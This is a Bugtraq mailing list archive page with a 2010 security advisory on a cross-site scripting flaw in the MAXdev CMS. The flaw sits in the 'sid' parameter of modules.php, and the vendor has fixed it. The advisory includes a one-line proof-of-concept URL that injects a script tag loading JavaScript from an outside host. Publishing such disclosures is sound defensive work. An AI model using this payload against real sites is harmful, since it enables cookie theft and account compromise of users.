Home page logo
/

bugtraq logo Bugtraq mailing list archives

XSS vulnerability in MAXdev
From: advisory () htbridge ch
Date: Sun, 22 Aug 2010 16:35:26 +0200 (CEST)

Vulnerability ID: HTB22563
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_maxdev.html
Product: MAXdev
Vendor: MAXdev ( http://www.maxdev.it/ ) 
Vulnerable Version: 1.0.83 and Probably Prior Versions
Vendor Notification: 05 August 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "modules.php" script to properly sanitize user-supplied input in "sid" 
variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of 
cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:


http://host/modules.php?op=modload&name=News&file=article&sid=1%22%3E%3Cscript+src=http://www.htbridge.ch/advisory/1.js+a=

Solution: Upgrade to the most recent version


  By Date           By Thread  

Current thread:
  • XSS vulnerability in MAXdev advisory (Aug 23)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault